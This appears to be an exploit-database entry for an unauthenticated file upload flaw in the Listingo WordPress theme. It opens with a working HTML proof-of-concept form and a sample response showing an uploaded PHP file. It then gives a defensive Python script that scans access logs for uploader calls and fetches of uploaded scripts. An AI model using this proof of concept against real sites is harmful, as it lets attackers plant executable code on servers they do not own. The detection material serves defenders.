## https://sploitus.com/exploit?id=WPEX-ID:E39B59B0-F24F-4DE5-A21C-C4DE34C3A14F
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Listingo Unauthenticated File Upload</title>
</head>
<body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=listingo_temp_uploader" method="post" enctype="multipart/form-data">
        Upload a File:
        <input type="file" name="listingo_uploader" id="listingo_uploader">
        <input type="submit" name="submit" value="Start Upload">
    </form>
</body>
</html>

The response gives the path to the uploaded file:
{"type":"success","url":"https:\/\/example.com\/wp-content\/uploads\/wp-custom-uploader\/1665086303.php","filename":"1665086303.php","message":"Image deleted."}
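
For defenders, the request and response above leave two traces in a web server access log: a POST to admin-ajax.php with action=listingo_temp_uploader, and a later request for a script file under wp-content/uploads/wp-custom-uploader/. The following detection sketch is an added example, not part of the original advisory; it assumes combined log format, and the sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2022:19:58:23 +0000] "POST /wp-admin/admin-ajax.php?action=listingo_temp_uploader HTTP/1.1" 200 160 "-" "curl/7.85.0"
203.0.113.7 - - [06/Oct/2022:19:58:31 +0000] "GET /wp-content/uploads/wp-custom-uploader/1665086303.php HTTP/1.1" 200 12 "-" "curl/7.85.0"
198.51.100.4 - - [06/Oct/2022:20:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Oct/2022:20:01:09 +0000] "GET /wp-content/uploads/wp-custom-uploader/1665086469.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
UPLOAD_DIR = "/wp-content/uploads/wp-custom-uploader/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

def classify(method, target):
    """Return 'upload', 'script_fetch' or None for one request line."""
    url = urlsplit(target)
    # Only a query-string action is visible here; an action sent in the POST
    # body does not appear in access logs and needs WAF or application logging.
    action = parse_qs(url.query).get("action", [""])[0]
    if (method == "POST" and url.path.endswith("/wp-admin/admin-ajax.php")
            and action == "listingo_temp_uploader"):
        return "upload"
    if UPLOAD_DIR in url.path and SCRIPT_EXT.search(url.path):
        return "script_fetch"
    return None

def scan(log_text):
    """Flag uploader calls and script requests in the temp upload directory."""
    findings, uploaders = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        kind = classify(m["method"], m["target"]) if m else None
        if kind is None:
            continue
        ip = m["ip"]
        if kind == "upload":
            uploaders.add(ip)
        # A served script from a client that just used the uploader is the strongest signal.
        hit = kind == "script_fetch" and ip in uploaders and m["status"] == "200"
        findings.append({"ip": ip, "time": m["ts"], "kind": kind,
                         "severity": "high" if hit else "medium", "target": m["target"]})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any existing .php file in the wp-custom-uploader directory is worth reviewing regardless of log coverage, since the uploader stores files under a web-accessible path.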